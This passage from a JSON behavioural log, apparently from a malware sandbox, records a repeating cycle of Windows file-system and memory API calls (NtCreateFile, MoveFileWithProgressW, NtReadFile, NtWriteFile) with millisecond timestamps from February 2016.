"2016-02-16 17:41:40,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,010", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,020", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,020", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,020", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,030", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,040", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,050", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,060", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,070", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,080", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,100", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,120", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,150", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,160", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,170", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,180", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,190", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,200", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,200", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,200", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,210", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,210", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,210", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,210", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,220", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,230", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,240", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,250", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,260", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,280", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,290", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,300", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,300", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,300", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,300", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,310", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,320", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,330", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,330", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,350", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,370", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 